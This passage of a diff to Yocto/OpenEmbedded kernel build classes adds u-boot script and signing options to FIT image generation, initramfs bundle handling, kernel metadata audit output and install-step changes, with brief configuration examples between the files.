@@ -124,7 +136,7 @@ fitimage_emit_section_kernel() {
fi
cat << EOF >> ${1}
- kernel@${2} {
+ kernel-${2} {
description = "Linux kernel";
data = /incbin/("${3}");
type = "kernel";
@@ -133,7 +145,7 @@ fitimage_emit_section_kernel() {
compression = "${4}";
load = <${UBOOT_LOADADDRESS}>;
entry = <${ENTRYPOINT}>;
- hash@1 {
+ hash-1 {
algo = "${kernel_csum}";
};
};
@@ -160,14 +172,14 @@ fitimage_emit_section_dtb() {
dtb_loadline="load = <${UBOOT_DTB_LOADADDRESS}>;"
fi
cat << EOF >> ${1}
- fdt@${2} {
+ fdt-${2} {
description = "Flattened Device Tree blob";
data = /incbin/("${3}");
type = "flat_dt";
arch = "${UBOOT_ARCH}";
compression = "none";
${dtb_loadline}
- hash@1 {
+ hash-1 {
algo = "${dtb_csum}";
};
};
@@ -175,6 +187,43 @@ EOF
}
#
+# Emit the fitImage ITS u-boot script section
+#
+# $1 ... .its filename
+# $2 ... Image counter
+# $3 ... Path to boot script image
+fitimage_emit_section_boot_script() {
+
+ bootscr_csum="${FIT_HASH_ALG}"
+ bootscr_sign_algo="${FIT_SIGN_ALG}"
+ bootscr_sign_keyname="${UBOOT_SIGN_IMG_KEYNAME}"
+
+ cat << EOF >> $1
+ bootscr-$2 {
+ description = "U-boot script";
+ data = /incbin/("$3");
+ type = "script";
+ arch = "${UBOOT_ARCH}";
+ compression = "none";
+ hash-1 {
+ algo = "$bootscr_csum";
+ };
+ };
+EOF
+
+ if [ "${UBOOT_SIGN_ENABLE}" = "1" -a "${FIT_SIGN_INDIVIDUAL}" = "1" -a -n "$bootscr_sign_keyname" ] ; then
+ sed -i '$ d' $1
+ cat << EOF >> $1
+ signature-1 {
+ algo = "$bootscr_csum,$bootscr_sign_algo";
+ key-name-hint = "$bootscr_sign_keyname";
+ };
+ };
+EOF
+ fi
+}
+
+#
# Emit the fitImage ITS setup section
#
# $1 ... .its filename
@@ -185,7 +234,7 @@ fitimage_emit_section_setup() {
setup_csum="${FIT_HASH_ALG}"
cat << EOF >> ${1}
- setup@${2} {
+ setup-${2} {
description = "Linux setup.bin";
data = /incbin/("${3}");
type = "x86_setup";
@@ -194,7 +243,7 @@ fitimage_emit_section_setup() {
compression = "none";
load = <0x00090000>;
entry = <0x00090000>;
- hash@1 {
+ hash-1 {
algo = "${setup_csum}";
};
};
@@ -221,7 +270,7 @@ fitimage_emit_section_ramdisk() {
fi
cat << EOF >> ${1}
- ramdisk@${2} {
+ ramdisk-${2} {
description = "${INITRAMFS_IMAGE}";
data = /incbin/("${3}");
type = "ramdisk";
@@ -230,7 +279,7 @@ fitimage_emit_section_ramdisk() {
compression = "none";
${ramdisk_loadline}
${ramdisk_entryline}
- hash@1 {
+ hash-1 {
algo = "${ramdisk_csum}";
};
};
@@ -244,13 +293,15 @@ EOF
# $2 ... Linux kernel ID
# $3 ... DTB image name
# $4 ... ramdisk ID
-# $5 ... config ID
-# $6 ... default flag
+# $5 ... u-boot script ID
+# $6 ... config ID
+# $7 ... default flag
fitimage_emit_section_config() {
conf_csum="${FIT_HASH_ALG}"
conf_sign_algo="${FIT_SIGN_ALG}"
- if [ -n "${UBOOT_SIGN_ENABLE}" ] ; then
+ conf_padding_algo="${FIT_PAD_ALG}"
+ if [ "${UBOOT_SIGN_ENABLE}" = "1" ] ; then
conf_sign_keyname="${UBOOT_SIGN_KEYNAME}"
fi
@@ -260,45 +311,53 @@ fitimage_emit_section_config() {
kernel_line=""
fdt_line=""
ramdisk_line=""
+ bootscr_line=""
setup_line=""
default_line=""
if [ -n "${2}" ]; then
conf_desc="Linux kernel"
sep=", "
- kernel_line="kernel = \"kernel@${2}\";"
+ kernel_line="kernel = \"kernel-${2}\";"
fi
if [ -n "${3}" ]; then
conf_desc="${conf_desc}${sep}FDT blob"
sep=", "
- fdt_line="fdt = \"fdt@${3}\";"
+ fdt_line="fdt = \"fdt-${3}\";"
fi
if [ -n "${4}" ]; then
conf_desc="${conf_desc}${sep}ramdisk"
sep=", "
- ramdisk_line="ramdisk = \"ramdisk@${4}\";"
+ ramdisk_line="ramdisk = \"ramdisk-${4}\";"
fi
if [ -n "${5}" ]; then
+ conf_desc="${conf_desc}${sep}u-boot script"
+ sep=", "
+ bootscr_line="bootscr = \"bootscr-${5}\";"
+ fi
+
+ if [ -n "${6}" ]; then
conf_desc="${conf_desc}${sep}setup"
- setup_line="setup = \"setup@${5}\";"
+ setup_line="setup = \"setup-${6}\";"
fi
- if [ "${6}" = "1" ]; then
- default_line="default = \"conf@${3}\";"
+ if [ "${7}" = "1" ]; then
+ default_line="default = \"conf-${3}\";"
fi
cat << EOF >> ${1}
${default_line}
- conf@${3} {
- description = "${6} ${conf_desc}";
+ conf-${3} {
+ description = "${7} ${conf_desc}";
${kernel_line}
${fdt_line}
${ramdisk_line}
+ ${bootscr_line}
${setup_line}
- hash@1 {
+ hash-1 {
algo = "${conf_csum}";
};
EOF
@@ -324,15 +383,21 @@ EOF
fi
if [ -n "${5}" ]; then
+ sign_line="${sign_line}${sep}\"bootscr\""
+ sep=", "
+ fi
+
+ if [ -n "${6}" ]; then
sign_line="${sign_line}${sep}\"setup\""
fi
sign_line="${sign_line};"
cat << EOF >> ${1}
- signature@1 {
+ signature-1 {
algo = "${conf_csum},${conf_sign_algo}";
key-name-hint = "${conf_sign_keyname}";
+ padding = "${conf_padding_algo}";
${sign_line}
};
EOF
@@ -355,6 +420,7 @@ fitimage_assemble() {
DTBS=""
ramdiskcount=${3}
setupcount=""
+ bootscr_id=""
rm -f ${1} arch/${ARCH}/boot/${2}
fitimage_emit_fit_header ${1}
@@ -365,7 +431,7 @@ fitimage_assemble() {
fitimage_emit_section_maint ${1} imagestart
uboot_prep_kimage
- fitimage_emit_section_kernel ${1} "${kernelcount}" linux.bin "${linux_comp}"
+ fitimage_emit_section_kernel $1 $kernelcount linux.bin "$linux_comp"
#
# Step 2: Prepare a DTB image section
@@ -399,7 +465,21 @@ fitimage_assemble() {
fi
#
- # Step 3: Prepare a setup section. (For x86)
+ # Step 3: Prepare a u-boot script section
+ #
+
+ if [ -n "${UBOOT_ENV}" ] && [ -d "${STAGING_DIR_HOST}/boot" ]; then
+ if [ -e "${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY}" ]; then
+ cp ${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY} ${B}
+ bootscr_id="${UBOOT_ENV_BINARY}"
+ fitimage_emit_section_boot_script ${1} "${bootscr_id}" ${UBOOT_ENV_BINARY}
+ else
+ bbwarn "${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY} not found."
+ fi
+ fi
+
+ #
+ # Step 4: Prepare a setup section. (For x86)
#
if [ -e arch/${ARCH}/boot/setup.bin ]; then
setupcount=1
@@ -407,9 +487,9 @@ fitimage_assemble() {
fi
#
- # Step 4: Prepare a ramdisk section.
+ # Step 5: Prepare a ramdisk section.
#
- if [ "x${ramdiskcount}" = "x1" ] ; then
+ if [ "x${ramdiskcount}" = "x1" ] && [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
# Find and use the first initramfs image archive type we find
for img in cpio.lz4 cpio.lzo cpio.lzma cpio.xz cpio.gz ext2.gz cpio; do
initramfs_path="${DEPLOY_DIR_IMAGE}/${INITRAMFS_IMAGE_NAME}.${img}"
@@ -430,7 +510,7 @@ fitimage_assemble() {
fi
#
- # Step 5: Prepare a configurations section
+ # Step 6: Prepare a configurations section
#
fitimage_emit_section_maint ${1} confstart
@@ -439,9 +519,9 @@ fitimage_assemble() {
for DTB in ${DTBS}; do
dtb_ext=${DTB##*.}
if [ "${dtb_ext}" = "dtbo" ]; then
- fitimage_emit_section_config ${1} "" "${DTB}" "" "" "`expr ${i} = ${dtbcount}`"
+ fitimage_emit_section_config ${1} "" "${DTB}" "" "${bootscr_id}" "" "`expr ${i} = ${dtbcount}`"
else
- fitimage_emit_section_config ${1} "${kernelcount}" "${DTB}" "${ramdiskcount}" "${setupcount}" "`expr ${i} = ${dtbcount}`"
+ fitimage_emit_section_config ${1} "${kernelcount}" "${DTB}" "${ramdiskcount}" "${bootscr_id}" "${setupcount}" "`expr ${i} = ${dtbcount}`"
fi
i=`expr ${i} + 1`
done
@@ -452,7 +532,7 @@ fitimage_assemble() {
fitimage_emit_section_maint ${1} fitend
#
- # Step 6: Assemble the image
+ # Step 7: Assemble the image
#
uboot-mkimage \
${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \
@@ -460,7 +540,7 @@ fitimage_assemble() {
arch/${ARCH}/boot/${2}
#
- # Step 7: Sign the image and add public key to U-Boot dtb
+ # Step 8: Sign the image and add public key to U-Boot dtb
#
if [ "x${UBOOT_SIGN_ENABLE}" = "x1" ] ; then
add_key_to_u_boot=""
@@ -474,7 +554,8 @@ fitimage_assemble() {
${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \
-F -k "${UBOOT_SIGN_KEYDIR}" \
$add_key_to_u_boot \
- -r arch/${ARCH}/boot/${2}
+ -r arch/${ARCH}/boot/${2} \
+ ${UBOOT_MKIMAGE_SIGN_ARGS}
fi
}
@@ -491,7 +572,11 @@ do_assemble_fitimage_initramfs() {
if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage" && \
test -n "${INITRAMFS_IMAGE}" ; then
cd ${B}
- fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage-${INITRAMFS_IMAGE} 1
+ if [ "${INITRAMFS_IMAGE_BUNDLE}" = "1" ]; then
+ fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage ""
+ else
+ fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage-${INITRAMFS_IMAGE} 1
+ fi
fi
}
@@ -502,22 +587,32 @@ kernel_do_deploy[vardepsexclude] = "DATETIME"
kernel_do_deploy_append() {
# Update deploy directory
if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage"; then
- echo "Copying fit-image.its source file..."
- install -m 0644 ${B}/fit-image.its "$deployDir/fitImage-its-${KERNEL_FIT_NAME}.its"
- ln -snf fitImage-its-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${KERNEL_FIT_LINK_NAME}"
+ if [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
+ echo "Copying fit-image.its source file..."
+ install -m 0644 ${B}/fit-image.its "$deployDir/fitImage-its-${KERNEL_FIT_NAME}.its"
+ if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
+ ln -snf fitImage-its-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${KERNEL_FIT_LINK_NAME}"
+ fi
- echo "Copying linux.bin file..."
- install -m 0644 ${B}/linux.bin $deployDir/fitImage-linux.bin-${KERNEL_FIT_NAME}.bin
- ln -snf fitImage-linux.bin-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-linux.bin-${KERNEL_FIT_LINK_NAME}"
+ echo "Copying linux.bin file..."
+ install -m 0644 ${B}/linux.bin $deployDir/fitImage-linux.bin-${KERNEL_FIT_NAME}.bin
+ if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
+ ln -snf fitImage-linux.bin-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-linux.bin-${KERNEL_FIT_LINK_NAME}"
+ fi
+ fi
if [ -n "${INITRAMFS_IMAGE}" ]; then
echo "Copying fit-image-${INITRAMFS_IMAGE}.its source file..."
install -m 0644 ${B}/fit-image-${INITRAMFS_IMAGE}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its"
ln -snf fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
- echo "Copying fitImage-${INITRAMFS_IMAGE} file..."
- install -m 0644 ${B}/arch/${ARCH}/boot/fitImage-${INITRAMFS_IMAGE} "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin"
- ln -snf fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
+ if [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
+ echo "Copying fitImage-${INITRAMFS_IMAGE} file..."
+ install -m 0644 ${B}/arch/${ARCH}/boot/fitImage-${INITRAMFS_IMAGE} "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin"
+ if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
+ ln -snf fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
+ fi
+ fi
fi
if [ "${UBOOT_SIGN_ENABLE}" = "1" -a -n "${UBOOT_DTB_BINARY}" ] ; then
# UBOOT_DTB_IMAGE is a realfile, but we can't use
@@ -527,3 +622,13 @@ kernel_do_deploy_append() {
fi
fi
}
+
+# The function below performs the following in case of initramfs bundles:
+# - Removes do_assemble_fitimage. FIT generation is done through
+# do_assemble_fitimage_initramfs. do_assemble_fitimage is not needed
+# and should not be part of the tasks to be executed.
+python () {
+ d.appendVarFlag('do_compile', 'vardeps', ' INITRAMFS_IMAGE_BUNDLE')
+ if d.getVar('INITRAMFS_IMAGE_BUNDLE') == "1":
+ bb.build.deltask('do_assemble_fitimage', d)
+}
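
Taken together, the new fitImage knobs are all configuration-driven. A minimal sketch of a signed, initramfs-bundled fitImage setup using only variables referenced above (the key name, mkimage comment and image name are illustrative, and UBOOT_SIGN_KEYDIR still has to point at real keys):

    KERNEL_IMAGETYPES += "fitImage"
    UBOOT_SIGN_ENABLE = "1"
    UBOOT_SIGN_KEYNAME = "dev"
    FIT_PAD_ALG = "pkcs-1.5"
    UBOOT_MKIMAGE_SIGN_ARGS = "-c 'signed build'"
    INITRAMFS_IMAGE = "core-image-minimal-initramfs"
    INITRAMFS_IMAGE_BUNDLE = "1"
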
diff --git a/meta/classes/kernel-module-split.bbclass b/meta/classes/kernel-module-split.bbclass
index c8ede26996..baa32e0a90 100644
--- a/meta/classes/kernel-module-split.bbclass
+++ b/meta/classes/kernel-module-split.bbclass
@@ -120,7 +120,10 @@ python split_kernel_module_packages () {
files = d.getVar('FILES_%s' % pkg)
files = "%s /etc/modules-load.d/%s.conf /etc/modprobe.d/%s.conf" % (files, basename, basename)
d.setVar('FILES_%s' % pkg, files)
- d.setVar('CONFFILES_%s' % pkg, files)
+
+ conffiles = d.getVar('CONFFILES_%s' % pkg)
+ conffiles = "%s /etc/modules-load.d/%s.conf /etc/modprobe.d/%s.conf" % (conffiles, basename, basename)
+ d.setVar('CONFFILES_%s' % pkg, conffiles)
if "description" in vals:
old_desc = d.getVar('DESCRIPTION_' + pkg) or ""
diff --git a/meta/classes/kernel-yocto.bbclass b/meta/classes/kernel-yocto.bbclass
index ec5fb7b1de..2abbc2ff66 100644
--- a/meta/classes/kernel-yocto.bbclass
+++ b/meta/classes/kernel-yocto.bbclass
@@ -105,6 +105,8 @@ do_kernel_metadata() {
cd ${S}
export KMETA=${KMETA}
+ bbnote "do_kernel_metadata: for summary/debug, set KCONF_AUDIT_LEVEL > 0"
+
# if kernel tools are available in-tree, they are preferred
# and are placed on the path before any external tools. Unless
# the external tools flag is set, in that case we do nothing.
@@ -192,7 +194,7 @@ do_kernel_metadata() {
# SRC_URI. If they were supplied, we convert them into include directives
# for the update part of the process
for f in ${feat_dirs}; do
- if [ -d "${WORKDIR}/$f/meta" ]; then
+ if [ -d "${WORKDIR}/$f/kernel-meta" ]; then
includes="$includes -I${WORKDIR}/$f/kernel-meta"
elif [ -d "${WORKDIR}/../oe-local-files/$f" ]; then
includes="$includes -I${WORKDIR}/../oe-local-files/$f"
@@ -252,6 +254,23 @@ do_kernel_metadata() {
bbfatal_log "Could not generate configuration queue for ${KMACHINE}."
fi
fi
+
+ if [ ${KCONF_AUDIT_LEVEL} -gt 0 ]; then
+ bbnote "kernel meta data summary for ${KMACHINE} (${LINUX_KERNEL_TYPE}):"
+ bbnote "======================================================================"
+ if [ -n "${KMETA_EXTERNAL_BSPS}" ]; then
+ bbnote "Non kernel-cache (external) bsp"
+ fi
+ bbnote "BSP entry point / definition: $bsp_definition"
+ if [ -n "$in_tree_defconfig" ]; then
+ bbnote "KBUILD_DEFCONFIG: ${KBUILD_DEFCONFIG}"
+ fi
+ bbnote "Fragments from SRC_URI: $sccs_from_src_uri"
+ bbnote "KERNEL_FEATURES: $KERNEL_FEATURES_FINAL"
+ bbnote "Final scc/cfg list: $sccs_defconfig $bsp_definition $sccs $KERNEL_FEATURES_FINAL"
+ fi
+
+ set -e
}
do_patch() {
@@ -281,6 +300,8 @@ do_patch() {
fi
done
fi
+
+ set -e
}
do_kernel_checkout() {
@@ -303,6 +324,21 @@ do_kernel_checkout() {
fi
fi
cd ${S}
+
+ # convert any remote branches to local tracking ones
+ for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
+ b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
+ git show-ref --quiet --verify -- "refs/heads/$b"
+ if [ $? -ne 0 ]; then
+ git branch $b $i > /dev/null
+ fi
+ done
+
+ # Create a working tree copy of the kernel by checking out a branch
+ machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
+
+ # checkout and clobber any unimportant files
+ git checkout -f ${machine_branch}
else
# case: we have no git repository at all.
# To support low bandwidth options for building the kernel, we'll just
@@ -325,20 +361,7 @@ do_kernel_checkout() {
git clean -d -f
fi
- # convert any remote branches to local tracking ones
- for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
- b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
- git show-ref --quiet --verify -- "refs/heads/$b"
- if [ $? -ne 0 ]; then
- git branch $b $i > /dev/null
- fi
- done
-
- # Create a working tree copy of the kernel by checking out a branch
- machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
-
- # checkout and clobber any unimportant files
- git checkout -f ${machine_branch}
+ set -e
}
do_kernel_checkout[dirs] = "${S}"
@@ -506,6 +529,8 @@ do_validate_branches() {
kgit-s2q --clean
fi
fi
+
+ set -e
}
OE_TERMINAL_EXPORTS += "KBUILD_OUTPUT"
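
As the added bbnote points out, the kernel metadata summary in do_kernel_metadata is only emitted when KCONF_AUDIT_LEVEL is greater than zero, which can be ensured from local.conf (illustrative):

    KCONF_AUDIT_LEVEL = "1"
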
diff --git a/meta/classes/kernel.bbclass b/meta/classes/kernel.bbclass
index 9e3c34ad48..ca7530095e 100644
--- a/meta/classes/kernel.bbclass
+++ b/meta/classes/kernel.bbclass
@@ -1,5 +1,7 @@
inherit linux-kernel-base kernel-module-split
+COMPATIBLE_HOST = ".*-linux"
+
KERNEL_PACKAGE_NAME ??= "kernel"
KERNEL_DEPLOYSUBDIR ??= "${@ "" if (d.getVar("KERNEL_PACKAGE_NAME") == "kernel") else d.getVar("KERNEL_PACKAGE_NAME") }"
@@ -73,7 +75,7 @@ python __anonymous () {
# KERNEL_IMAGETYPES may contain a mixture of image types supported directly
# by the kernel build system and types which are created by post-processing
# the output of the kernel build system (e.g. compressing vmlinux ->
- # vmlinux.gz in kernel_do_compile()).
+ # vmlinux.gz in kernel_do_transform_kernel()).
# KERNEL_IMAGETYPE_FOR_MAKE should contain only image types supported
# directly by the kernel build system.
if not d.getVar('KERNEL_IMAGETYPE_FOR_MAKE'):
@@ -89,6 +91,8 @@ python __anonymous () {
imagedest = d.getVar('KERNEL_IMAGEDEST')
for type in types.split():
+ if bb.data.inherits_class('nopackages', d):
+ continue
typelower = type.lower()
d.appendVar('PACKAGES', ' %s-image-%s' % (kname, typelower))
d.setVar('FILES_' + kname + '-image-' + typelower, '/' + imagedest + '/' + type + '-${KERNEL_VERSION_NAME}' + ' /' + imagedest + '/' + type)
@@ -102,6 +106,8 @@ python __anonymous () {
# standalone for use by wic and other tools.
if image:
d.appendVarFlag('do_bundle_initramfs', 'depends', ' ${INITRAMFS_IMAGE}:do_image_complete')
+ if image and bb.utils.to_boolean(d.getVar('INITRAMFS_IMAGE_BUNDLE')):
+ bb.build.addtask('do_transform_bundled_initramfs', 'do_deploy', 'do_bundle_initramfs', d)
# NOTE: setting INITRAMFS_TASK is for backward compatibility
# The preferred method is to set INITRAMFS_IMAGE, because
@@ -137,13 +143,14 @@ do_unpack[cleandirs] += " ${S} ${STAGING_KERNEL_DIR} ${B} ${STAGING_KERNEL_BUILD
do_clean[cleandirs] += " ${S} ${STAGING_KERNEL_DIR} ${B} ${STAGING_KERNEL_BUILDDIR}"
python do_symlink_kernsrc () {
s = d.getVar("S")
- if s[-1] == '/':
- # drop trailing slash, so that os.symlink(kernsrc, s) doesn't use s as directory name and fail
- s=s[:-1]
kernsrc = d.getVar("STAGING_KERNEL_DIR")
if s != kernsrc:
bb.utils.mkdirhier(kernsrc)
bb.utils.remove(kernsrc, recurse=True)
+ if s[-1] == '/':
+ # drop trailing slash, so that os.symlink(kernsrc, s) doesn't use s as
+ # directory name and fail
+ s = s[:-1]
if d.getVar("EXTERNALSRC"):
# With EXTERNALSRC S will not be wiped so we can symlink to it
os.symlink(s, kernsrc)
@@ -192,6 +199,8 @@ UBOOT_LOADADDRESS ?= "${UBOOT_ENTRYPOINT}"
KERNEL_EXTRA_ARGS ?= ""
EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}""
+EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}""
+
KERNEL_ALT_IMAGETYPE ??= ""
copy_initramfs() {
@@ -274,6 +283,14 @@ do_bundle_initramfs () {
}
do_bundle_initramfs[dirs] = "${B}"
+kernel_do_transform_bundled_initramfs() {
+ # vmlinux.gz is not built by kernel
+ if (echo "${KERNEL_IMAGETYPES}" | grep -wq "vmlinux\.gz"); then
+ gzip -9cn < ${KERNEL_OUTPUT_DIR}/vmlinux.initramfs > ${KERNEL_OUTPUT_DIR}/vmlinux.gz.initramfs
+ fi
+}
+do_transform_bundled_initramfs[dirs] = "${B}"
+
python do_devshell_prepend () {
os.environ["LDFLAGS"] = ''
}
@@ -305,6 +322,10 @@ kernel_do_compile() {
export KBUILD_BUILD_TIMESTAMP="$ts"
export KCONFIG_NOTIMESTAMP=1
bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
+ else
+ ts=`LC_ALL=C date`
+ export KBUILD_BUILD_TIMESTAMP="$ts"
+ bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
fi
# The $use_alternate_initrd is only set from
# do_bundle_initramfs() This variable is specifically for the
@@ -323,12 +344,17 @@ kernel_do_compile() {
for typeformake in ${KERNEL_IMAGETYPE_FOR_MAKE} ; do
oe_runmake ${typeformake} CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS} $use_alternate_initrd
done
+}
+
+kernel_do_transform_kernel() {
# vmlinux.gz is not built by kernel
if (echo "${KERNEL_IMAGETYPES}" | grep -wq "vmlinux\.gz"); then
mkdir -p "${KERNEL_OUTPUT_DIR}"
gzip -9cn < ${B}/vmlinux > "${KERNEL_OUTPUT_DIR}/vmlinux.gz"
fi
}
+do_transform_kernel[dirs] = "${B}"
+addtask transform_kernel after do_compile before do_install
do_compile_kernelmodules() {
unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE
@@ -346,6 +372,10 @@ do_compile_kernelmodules() {
export KBUILD_BUILD_TIMESTAMP="$ts"
export KCONFIG_NOTIMESTAMP=1
bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
+ else
+ ts=`LC_ALL=C date`
+ export KBUILD_BUILD_TIMESTAMP="$ts"
+ bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
fi
if (grep -q -i -e '^CONFIG_MODULES=y$' ${B}/.config); then
cc_extra=$(get_cc_option)
@@ -358,6 +388,10 @@ do_compile_kernelmodules() {
# other kernel modules and will look at this
# file to do symbol lookups
cp ${B}/Module.symvers ${STAGING_KERNEL_BUILDDIR}/
+ # 5.10+ kernels have module.lds that we need to copy for external module builds
+ if [ -e "${B}/scripts/module.lds" ]; then
+ install -Dm 0644 ${B}/scripts/module.lds ${STAGING_KERNEL_BUILDDIR}/scripts/module.lds
+ fi
else
bbnote "no modules to compile"
fi
@@ -371,8 +405,8 @@ kernel_do_install() {
unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE
if (grep -q -i -e '^CONFIG_MODULES=y$' .config); then
oe_runmake DEPMOD=echo MODLIB=${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION} INSTALL_FW_PATH=${D}${nonarch_base_libdir}/firmware modules_install
- rm "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/build"
- rm "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/source"
+ rm -f "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/build"
+ rm -f "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/source"
# If the kernel/ directory is empty remove it to prevent QA issues
rmdir --ignore-fail-on-non-empty "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/kernel"
else
@@ -384,12 +418,26 @@ kernel_do_install() {
#
install -d ${D}/${KERNEL_IMAGEDEST}
install -d ${D}/boot
+
+ #
+ # When including an initramfs bundle inside a FIT image, the fitImage is created after the install task
+ # by do_assemble_fitimage_initramfs.
+ # This happens after the generation of the initramfs bundle (done by do_bundle_initramfs).
+ # So, at the level of the install task we should not try to install the fitImage. fitImage is still not
+ # generated yet.
+ # After the generation of the fitImage, the deploy task copies the fitImage from the build directory to
+ # the deploy folder.
+ #
+
for imageType in ${KERNEL_IMAGETYPES} ; do
- install -m 0644 ${KERNEL_OUTPUT_DIR}/${imageType} ${D}/${KERNEL_IMAGEDEST}/${imageType}-${KERNEL_VERSION}
- if [ "${KERNEL_PACKAGE_NAME}" = "kernel" ]; then
- ln -sf ${imageType}-${KERNEL_VERSION} ${D}/${KERNEL_IMAGEDEST}/${imageType}
+ if [ $imageType != "fitImage" ] || [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ] ; then
+ install -m 0644 ${KERNEL_OUTPUT_DIR}/${imageType} ${D}/${KERNEL_IMAGEDEST}/${imageType}-${KERNEL_VERSION}
+ if [ "${KERNEL_PACKAGE_NAME}" = "kernel" ]; then
+ ln -sf ${imageType}-${KERNEL_VERSION} ${D}/${KERNEL_IMAGEDEST}/${imageType}
+ fi
fi
done
+
install -m 0644 System.map ${D}/boot/System.map-${KERNEL_VERSION}
install -m 0644 .config ${D}/boot/config-${KERNEL_VERSION}
install -m 0644 vmlinux ${D}/boot/vmlinux-${KERNEL_VERSION}
@@ -397,7 +445,6 @@ kernel_do_install() {
install -d ${D}${sysconfdir}/modules-load.d
install -d ${D}${sysconfdir}/modprobe.d
}
-do_install[prefuncs] += "package_get_auto_pr"
# Must be ran no earlier than after do_kernel_checkout or else Makefile won't be in ${S}/Makefile
do_kernel_version_sanity_check() {
@@ -563,11 +610,11 @@ do_savedefconfig() {
do_savedefconfig[nostamp] = "1"
addtask savedefconfig after do_configure
-inherit cml1
+inherit cml1 pkgconfig
-KCONFIG_CONFIG_COMMAND_append = " HOSTLDFLAGS='${BUILD_LDFLAGS}'"
+KCONFIG_CONFIG_COMMAND_append = " LD='${KERNEL_LD}' HOSTLDFLAGS='${BUILD_LDFLAGS}'"
-EXPORT_FUNCTIONS do_compile do_install do_configure
+EXPORT_FUNCTIONS do_compile do_transform_kernel do_transform_bundled_initramfs do_install do_configure
# kernel-base becomes kernel-${KERNEL_VERSION}
# kernel-image becomes kernel-image-${KERNEL_VERSION}
@@ -673,7 +720,7 @@ do_sizecheck() {
at_least_one_fits=
for imageType in ${KERNEL_IMAGETYPES} ; do
size=`du -ks ${B}/${KERNEL_OUTPUT_DIR}/$imageType | awk '{print $1}'`
- if [ $size -ge ${KERNEL_IMAGE_MAXSIZE} ]; then
+ if [ $size -gt ${KERNEL_IMAGE_MAXSIZE} ]; then
bbwarn "This kernel $imageType (size=$size(K) > ${KERNEL_IMAGE_MAXSIZE}(K)) is too big for your device."
else
at_least_one_fits=y
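
Note that do_sizecheck now uses -gt, so an image whose du -ks size exactly equals the limit no longer triggers the warning; a machine setting such as the following (illustrative, in kB) accepts a kernel of exactly 8192 kB:

    KERNEL_IMAGE_MAXSIZE = "8192"
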
diff --git a/meta/classes/libc-package.bbclass b/meta/classes/libc-package.bbclass
index de3b4250c7..72f489d673 100644
--- a/meta/classes/libc-package.bbclass
+++ b/meta/classes/libc-package.bbclass
@@ -45,6 +45,7 @@ PACKAGE_NO_GCONV ?= "0"
OVERRIDES_append = ":${TARGET_ARCH}-${TARGET_OS}"
locale_base_postinst_ontarget() {
+mkdir ${libdir}/locale
localedef --inputfile=${datadir}/i18n/locales/%s --charmap=%s %s
}
@@ -355,7 +356,7 @@ python package_do_split_gconvs () {
m.write("\t@echo 'Progress %d/%d'\n" % (i, total))
m.write("\t" + makerecipe + "\n\n")
d.setVar("EXTRA_OEMAKE", "-C %s ${PARALLEL_MAKE}" % (os.path.dirname(makefile)))
- d.setVarFlag("oe_runmake", "progress", "outof:Progress\s(\d+)/(\d+)")
+ d.setVarFlag("oe_runmake", "progress", r"outof:Progress\s(\d+)/(\d+)")
bb.note("Executing binary locale generation makefile")
